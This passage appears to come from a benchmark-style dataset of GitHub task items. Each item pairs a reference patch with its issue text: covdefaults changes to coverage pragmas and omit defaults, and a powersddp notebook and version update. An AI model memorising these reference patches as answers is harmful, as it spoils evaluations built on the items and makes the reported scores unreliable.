@@ -53,6 +101,15 @@ def _plat_impl_pragmas() -> List[str]:
# non-runnable code
r'^if __name__ == [\'"]__main__[\'"]:$',
*_plat_impl_pragmas(),
+ *_version_pragmas(),
+ ],
+ ),
+ (
+ 'report:partial_branches',
+ [
+ r'# pragma: no branch\b',
+ # version specific no cover
+ r'# pragma: (>=?|<=?|==|!=)\d+\.\d+ cover\b',
],
),
)
| version specific coverage pragmas
might be a fun little regex game, but it would be nice to support `# pragma: >=3.7 no cover` or some such
| 2021-11-28T04:46:08 | 0.0 | [] | [] |
|||
asottile/covdefaults | asottile__covdefaults-50 | cafccbdab43191a9fbf558e73d2f04456d9d5282 | diff --git a/README.md b/README.md
index ba411e1..281cd5a 100644
--- a/README.md
+++ b/README.md
@@ -46,10 +46,8 @@ plugins = ["covdefaults"]
branch = True
source = .
omit =
- */.tox/*
*/__main__.py
*/setup.py
- */venv*/*
```
### `[coverage:report]`
@@ -144,11 +142,11 @@ to the defaults provided by `covdefaults`.
```ini
[covdefaults]
-subtract_omit = */.tox/*
+subtract_omit = */__main__.py
```
-this will result in `*/.tox/*` not being `omit`ted (`*/.tox/*` is among the
-defaults provided by `covdefaults`).
+this will result in `*/__main__.py` not being `omit`ted (`*/__main__.py` is
+among the defaults provided by `covdefaults`).
#### `run:source`
diff --git a/covdefaults.py b/covdefaults.py
index dde93de..57cd55e 100644
--- a/covdefaults.py
+++ b/covdefaults.py
@@ -34,7 +34,7 @@ def _plat_impl_pragmas(): # type: () -> List[str]
('report:skip_covered', True),
)
EXTEND = (
- ('run:omit', ['*/.tox/*', '*/__main__.py', '*/setup.py', '*/venv*/*']),
+ ('run:omit', ['*/__main__.py', '*/setup.py']),
(
'report:exclude_lines',
[
diff --git a/setup.cfg b/setup.cfg
index d0e2043..12d10c7 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -24,7 +24,7 @@ classifiers =
[options]
py_modules = covdefaults
install_requires =
- coverage>=4.5
+ coverage>=6.0.2
python_requires = >=3.6.1
[bdist_wheel]
| coverage 6.x: might not need site-packages excludes ?
| 2021-10-15T23:55:51 | 0.0 | [] | [] |
|||
ettoreaquino/powersddp | ettoreaquino__powersddp-18 | 4ce537810d7f476196f38e57a3346a488e96461d | diff --git a/CITATION.cff b/CITATION.cff
index d98da6d..3da8f7d 100644
--- a/CITATION.cff
+++ b/CITATION.cff
@@ -15,8 +15,8 @@ authors:
title: "PPEE_210092: Power System Stochastic Dual Dynamic Programming Library"
-version: 0.0.1
+version: 0.0.2
-date-released: 2021-08-22
+date-released: 2021-08-25
url: "https://github.com/ettoreaquino/powersddp"
diff --git a/Notebook.ipynb b/Notebook.ipynb
index 1eb6b54..14a0d62 100644
--- a/Notebook.ipynb
+++ b/Notebook.ipynb
@@ -2,34 +2,19 @@
"cells": [
{
"cell_type": "code",
- "execution_count": 2,
+ "execution_count": null,
"id": "9dd8e6a5-b075-404b-85eb-6131fcca2a2a",
"metadata": {},
"outputs": [],
"source": [
"import powersddp as psddp\n",
"\n",
- "\n",
- "data = {'load': [100, 15, 50],\n",
- " 'discretizations': 3,\n",
- " 'stages': 3,\n",
- " 'scenarios': 2,\n",
- " 'outage_cost': 500,\n",
- " 'hydro-units': [{'name': 'HU1',\n",
- " 'v_max': 100,\n",
- " 'v_min': 20,\n",
- " 'prod': 0.95,\n",
- " 'flow_max': 60,\n",
- " 'inflow_scenarios': [[23, 16], [19, 14], [15, 11]]}],\n",
- " 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
- " {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
- "\n",
- "TestSystem = psddp.PowerSystem(data=data)"
+ "TestSystem = psddp.PowerSystem(path='system.yml')"
]
},
{
"cell_type": "code",
- "execution_count": 6,
+ "execution_count": null,
"id": "0b41801a-dc45-4777-a2ec-1294c91890cc",
"metadata": {
"scrolled": true,
@@ -37,7 +22,7 @@
},
"outputs": [],
"source": [
- "operation = TestSystem.dispatch()"
+ "operation = TestSystem.dispatch(solver='ulp', scenario=1, plot=True)"
]
},
{
@@ -88,7 +73,7 @@
},
{
"cell_type": "code",
- "execution_count": 16,
+ "execution_count": null,
"id": "ccbf3a14-01ed-4942-acb3-a4c64f47b6fd",
"metadata": {},
"outputs": [],
@@ -228,1024 +213,12 @@
},
{
"cell_type": "code",
- "execution_count": 17,
+ "execution_count": null,
"id": "2b718ada-dd91-4cb6-a31c-f36b61674065",
"metadata": {
"tags": []
},
- "outputs": [
- {
- "data": {
- "application/vnd.plotly.v1+json": {
- "config": {
- "plotlyServerURL": "https://plot.ly"
- },
- "data": [
- {
- "mode": "lines",
- "name": "Stage 1",
- "type": "scatter",
- "x": [
- 20,
- 60,
- 100
- ],
- "xaxis": "x3",
- "y": [
- 6725,
- 7.75,
- 0
- ],
- "yaxis": "y3"
- },
- {
- "mode": "lines",
- "name": "Stage 2",
- "type": "scatter",
- "x": [
- 20,
- 60,
- 100
- ],
- "xaxis": "x2",
- "y": [
- 11787.5,
- 226.93,
- 0.62
- ],
- "yaxis": "y2"
- },
- {
- "mode": "lines",
- "name": "Stage 3",
- "type": "scatter",
- "x": [
- 20,
- 60,
- 100
- ],
- "xaxis": "x",
- "y": [
- 15425,
- 576.31,
- 161.68
- ],
- "yaxis": "y"
- }
- ],
- "layout": {
- "autosize": true,
- "template": {
- "data": {
- "bar": [
- {
- "error_x": {
- "color": "#2a3f5f"
- },
- "error_y": {
- "color": "#2a3f5f"
- },
- "marker": {
- "line": {
- "color": "#E5ECF6",
- "width": 0.5
- },
- "pattern": {
- "fillmode": "overlay",
- "size": 10,
- "solidity": 0.2
- }
- },
- "type": "bar"
- }
- ],
- "barpolar": [
- {
- "marker": {
- "line": {
- "color": "#E5ECF6",
- "width": 0.5
- },
- "pattern": {
- "fillmode": "overlay",
- "size": 10,
- "solidity": 0.2
- }
- },
- "type": "barpolar"
- }
- ],
- "carpet": [
- {
- "aaxis": {
- "endlinecolor": "#2a3f5f",
- "gridcolor": "white",
- "linecolor": "white",
- "minorgridcolor": "white",
- "startlinecolor": "#2a3f5f"
- },
- "baxis": {
- "endlinecolor": "#2a3f5f",
- "gridcolor": "white",
- "linecolor": "white",
- "minorgridcolor": "white",
- "startlinecolor": "#2a3f5f"
- },
- "type": "carpet"
- }
- ],
- "choropleth": [
- {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- },
- "type": "choropleth"
- }
- ],
- "contour": [
- {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- },
- "colorscale": [
- [
- 0,
- "#0d0887"
- ],
- [
- 0.1111111111111111,
- "#46039f"
- ],
- [
- 0.2222222222222222,
- "#7201a8"
- ],
- [
- 0.3333333333333333,
- "#9c179e"
- ],
- [
- 0.4444444444444444,
- "#bd3786"
- ],
- [
- 0.5555555555555556,
- "#d8576b"
- ],
- [
- 0.6666666666666666,
- "#ed7953"
- ],
- [
- 0.7777777777777778,
- "#fb9f3a"
- ],
- [
- 0.8888888888888888,
- "#fdca26"
- ],
- [
- 1,
- "#f0f921"
- ]
- ],
- "type": "contour"
- }
- ],
- "contourcarpet": [
- {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- },
- "type": "contourcarpet"
- }
- ],
- "heatmap": [
- {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- },
- "colorscale": [
- [
- 0,
- "#0d0887"
- ],
- [
- 0.1111111111111111,
- "#46039f"
- ],
- [
- 0.2222222222222222,
- "#7201a8"
- ],
- [
- 0.3333333333333333,
- "#9c179e"
- ],
- [
- 0.4444444444444444,
- "#bd3786"
- ],
- [
- 0.5555555555555556,
- "#d8576b"
- ],
- [
- 0.6666666666666666,
- "#ed7953"
- ],
- [
- 0.7777777777777778,
- "#fb9f3a"
- ],
- [
- 0.8888888888888888,
- "#fdca26"
- ],
- [
- 1,
- "#f0f921"
- ]
- ],
- "type": "heatmap"
- }
- ],
- "heatmapgl": [
- {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- },
- "colorscale": [
- [
- 0,
- "#0d0887"
- ],
- [
- 0.1111111111111111,
- "#46039f"
- ],
- [
- 0.2222222222222222,
- "#7201a8"
- ],
- [
- 0.3333333333333333,
- "#9c179e"
- ],
- [
- 0.4444444444444444,
- "#bd3786"
- ],
- [
- 0.5555555555555556,
- "#d8576b"
- ],
- [
- 0.6666666666666666,
- "#ed7953"
- ],
- [
- 0.7777777777777778,
- "#fb9f3a"
- ],
- [
- 0.8888888888888888,
- "#fdca26"
- ],
- [
- 1,
- "#f0f921"
- ]
- ],
- "type": "heatmapgl"
- }
- ],
- "histogram": [
- {
- "marker": {
- "pattern": {
- "fillmode": "overlay",
- "size": 10,
- "solidity": 0.2
- }
- },
- "type": "histogram"
- }
- ],
- "histogram2d": [
- {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- },
- "colorscale": [
- [
- 0,
- "#0d0887"
- ],
- [
- 0.1111111111111111,
- "#46039f"
- ],
- [
- 0.2222222222222222,
- "#7201a8"
- ],
- [
- 0.3333333333333333,
- "#9c179e"
- ],
- [
- 0.4444444444444444,
- "#bd3786"
- ],
- [
- 0.5555555555555556,
- "#d8576b"
- ],
- [
- 0.6666666666666666,
- "#ed7953"
- ],
- [
- 0.7777777777777778,
- "#fb9f3a"
- ],
- [
- 0.8888888888888888,
- "#fdca26"
- ],
- [
- 1,
- "#f0f921"
- ]
- ],
- "type": "histogram2d"
- }
- ],
- "histogram2dcontour": [
- {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- },
- "colorscale": [
- [
- 0,
- "#0d0887"
- ],
- [
- 0.1111111111111111,
- "#46039f"
- ],
- [
- 0.2222222222222222,
- "#7201a8"
- ],
- [
- 0.3333333333333333,
- "#9c179e"
- ],
- [
- 0.4444444444444444,
- "#bd3786"
- ],
- [
- 0.5555555555555556,
- "#d8576b"
- ],
- [
- 0.6666666666666666,
- "#ed7953"
- ],
- [
- 0.7777777777777778,
- "#fb9f3a"
- ],
- [
- 0.8888888888888888,
- "#fdca26"
- ],
- [
- 1,
- "#f0f921"
- ]
- ],
- "type": "histogram2dcontour"
- }
- ],
- "mesh3d": [
- {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- },
- "type": "mesh3d"
- }
- ],
- "parcoords": [
- {
- "line": {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- }
- },
- "type": "parcoords"
- }
- ],
- "pie": [
- {
- "automargin": true,
- "type": "pie"
- }
- ],
- "scatter": [
- {
- "marker": {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- }
- },
- "type": "scatter"
- }
- ],
- "scatter3d": [
- {
- "line": {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- }
- },
- "marker": {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- }
- },
- "type": "scatter3d"
- }
- ],
- "scattercarpet": [
- {
- "marker": {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- }
- },
- "type": "scattercarpet"
- }
- ],
- "scattergeo": [
- {
- "marker": {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- }
- },
- "type": "scattergeo"
- }
- ],
- "scattergl": [
- {
- "marker": {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- }
- },
- "type": "scattergl"
- }
- ],
- "scattermapbox": [
- {
- "marker": {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- }
- },
- "type": "scattermapbox"
- }
- ],
- "scatterpolar": [
- {
- "marker": {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- }
- },
- "type": "scatterpolar"
- }
- ],
- "scatterpolargl": [
- {
- "marker": {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- }
- },
- "type": "scatterpolargl"
- }
- ],
- "scatterternary": [
- {
- "marker": {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- }
- },
- "type": "scatterternary"
- }
- ],
- "surface": [
- {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- },
- "colorscale": [
- [
- 0,
- "#0d0887"
- ],
- [
- 0.1111111111111111,
- "#46039f"
- ],
- [
- 0.2222222222222222,
- "#7201a8"
- ],
- [
- 0.3333333333333333,
- "#9c179e"
- ],
- [
- 0.4444444444444444,
- "#bd3786"
- ],
- [
- 0.5555555555555556,
- "#d8576b"
- ],
- [
- 0.6666666666666666,
- "#ed7953"
- ],
- [
- 0.7777777777777778,
- "#fb9f3a"
- ],
- [
- 0.8888888888888888,
- "#fdca26"
- ],
- [
- 1,
- "#f0f921"
- ]
- ],
- "type": "surface"
- }
- ],
- "table": [
- {
- "cells": {
- "fill": {
- "color": "#EBF0F8"
- },
- "line": {
- "color": "white"
- }
- },
- "header": {
- "fill": {
- "color": "#C8D4E3"
- },
- "line": {
- "color": "white"
- }
- },
- "type": "table"
- }
- ]
- },
- "layout": {
- "annotationdefaults": {
- "arrowcolor": "#2a3f5f",
- "arrowhead": 0,
- "arrowwidth": 1
- },
- "autotypenumbers": "strict",
- "coloraxis": {
- "colorbar": {
- "outlinewidth": 0,
- "ticks": ""
- }
- },
- "colorscale": {
- "diverging": [
- [
- 0,
- "#8e0152"
- ],
- [
- 0.1,
- "#c51b7d"
- ],
- [
- 0.2,
- "#de77ae"
- ],
- [
- 0.3,
- "#f1b6da"
- ],
- [
- 0.4,
- "#fde0ef"
- ],
- [
- 0.5,
- "#f7f7f7"
- ],
- [
- 0.6,
- "#e6f5d0"
- ],
- [
- 0.7,
- "#b8e186"
- ],
- [
- 0.8,
- "#7fbc41"
- ],
- [
- 0.9,
- "#4d9221"
- ],
- [
- 1,
- "#276419"
- ]
- ],
- "sequential": [
- [
- 0,
- "#0d0887"
- ],
- [
- 0.1111111111111111,
- "#46039f"
- ],
- [
- 0.2222222222222222,
- "#7201a8"
- ],
- [
- 0.3333333333333333,
- "#9c179e"
- ],
- [
- 0.4444444444444444,
- "#bd3786"
- ],
- [
- 0.5555555555555556,
- "#d8576b"
- ],
- [
- 0.6666666666666666,
- "#ed7953"
- ],
- [
- 0.7777777777777778,
- "#fb9f3a"
- ],
- [
- 0.8888888888888888,
- "#fdca26"
- ],
- [
- 1,
- "#f0f921"
- ]
- ],
- "sequentialminus": [
- [
- 0,
- "#0d0887"
- ],
- [
- 0.1111111111111111,
- "#46039f"
- ],
- [
- 0.2222222222222222,
- "#7201a8"
- ],
- [
- 0.3333333333333333,
- "#9c179e"
- ],
- [
- 0.4444444444444444,
- "#bd3786"
- ],
- [
- 0.5555555555555556,
- "#d8576b"
- ],
- [
- 0.6666666666666666,
- "#ed7953"
- ],
- [
- 0.7777777777777778,
- "#fb9f3a"
- ],
- [
- 0.8888888888888888,
- "#fdca26"
- ],
- [
- 1,
- "#f0f921"
- ]
- ]
- },
- "colorway": [
- "#636efa",
- "#EF553B",
- "#00cc96",
- "#ab63fa",
- "#FFA15A",
- "#19d3f3",
- "#FF6692",
- "#B6E880",
- "#FF97FF",
- "#FECB52"
- ],
- "font": {
- "color": "#2a3f5f"
- },
- "geo": {
- "bgcolor": "white",
- "lakecolor": "white",
- "landcolor": "#E5ECF6",
- "showlakes": true,
- "showland": true,
- "subunitcolor": "white"
- },
- "hoverlabel": {
- "align": "left"
- },
- "hovermode": "closest",
- "mapbox": {
- "style": "light"
- },
- "paper_bgcolor": "white",
- "plot_bgcolor": "#E5ECF6",
- "polar": {
- "angularaxis": {
- "gridcolor": "white",
- "linecolor": "white",
- "ticks": ""
- },
- "bgcolor": "#E5ECF6",
- "radialaxis": {
- "gridcolor": "white",
- "linecolor": "white",
- "ticks": ""
- }
- },
- "scene": {
- "xaxis": {
- "backgroundcolor": "#E5ECF6",
- "gridcolor": "white",
- "gridwidth": 2,
- "linecolor": "white",
- "showbackground": true,
- "ticks": "",
- "zerolinecolor": "white"
- },
- "yaxis": {
- "backgroundcolor": "#E5ECF6",
- "gridcolor": "white",
- "gridwidth": 2,
- "linecolor": "white",
- "showbackground": true,
- "ticks": "",
- "zerolinecolor": "white"
- },
- "zaxis": {
- "backgroundcolor": "#E5ECF6",
- "gridcolor": "white",
- "gridwidth": 2,
- "linecolor": "white",
- "showbackground": true,
- "ticks": "",
- "zerolinecolor": "white"
- }
- },
- "shapedefaults": {
- "line": {
- "color": "#2a3f5f"
- }
- },
- "ternary": {
- "aaxis": {
- "gridcolor": "white",
- "linecolor": "white",
- "ticks": ""
- },
- "baxis": {
- "gridcolor": "white",
- "linecolor": "white",
- "ticks": ""
- },
- "bgcolor": "#E5ECF6",
- "caxis": {
- "gridcolor": "white",
- "linecolor": "white",
- "ticks": ""
- }
- },
- "title": {
- "x": 0.05
- },
- "xaxis": {
- "automargin": true,
- "gridcolor": "white",
- "linecolor": "white",
- "ticks": "",
- "title": {
- "standoff": 15
- },
- "zerolinecolor": "white",
- "zerolinewidth": 2
- },
- "yaxis": {
- "automargin": true,
- "gridcolor": "white",
- "linecolor": "white",
- "ticks": "",
- "title": {
- "standoff": 15
- },
- "zerolinecolor": "white",
- "zerolinewidth": 2
- }
- }
- },
- "title": {
- "text": "Future Cost Function"
- },
- "xaxis": {
- "anchor": "y",
- "autorange": true,
- "domain": [
- 0,
- 1
- ],
- "range": [
- 20,
- 100
- ],
- "title": {
- "text": "Final Volume [hm3]"
- },
- "type": "linear"
- },
- "xaxis2": {
- "anchor": "y2",
- "autorange": true,
- "domain": [
- 0,
- 1
- ],
- "range": [
- 20,
- 100
- ],
- "title": {
- "text": "Final Volume [hm3]"
- },
- "type": "linear"
- },
- "xaxis3": {
- "anchor": "y3",
- "autorange": true,
- "domain": [
- 0,
- 1
- ],
- "range": [
- 20,
- 100
- ],
- "title": {
- "text": "Final Volume [hm3]"
- },
- "type": "linear"
- },
- "yaxis": {
- "anchor": "x",
- "autorange": true,
- "domain": [
- 0.7333333333333333,
- 1
- ],
- "range": [
- -686.2822222222221,
- 16272.962222222222
- ],
- "title": {
- "text": "$/MW"
- },
- "type": "linear"
- },
- "yaxis2": {
- "anchor": "x2",
- "autorange": true,
- "domain": [
- 0.36666666666666664,
- 0.6333333333333333
- ],
- "range": [
- -654.2066666666667,
- 12442.326666666666
- ],
- "title": {
- "text": "$/MW"
- },
- "type": "linear"
- },
- "yaxis3": {
- "anchor": "x3",
- "autorange": true,
- "domain": [
- 0,
- 0.26666666666666666
- ],
- "range": [
- -373.61111111111114,
- 7098.611111111111
- ],
- "title": {
- "text": "$/MW"
- },
- "type": "linear"
- }
- }
- },
- "image/png": "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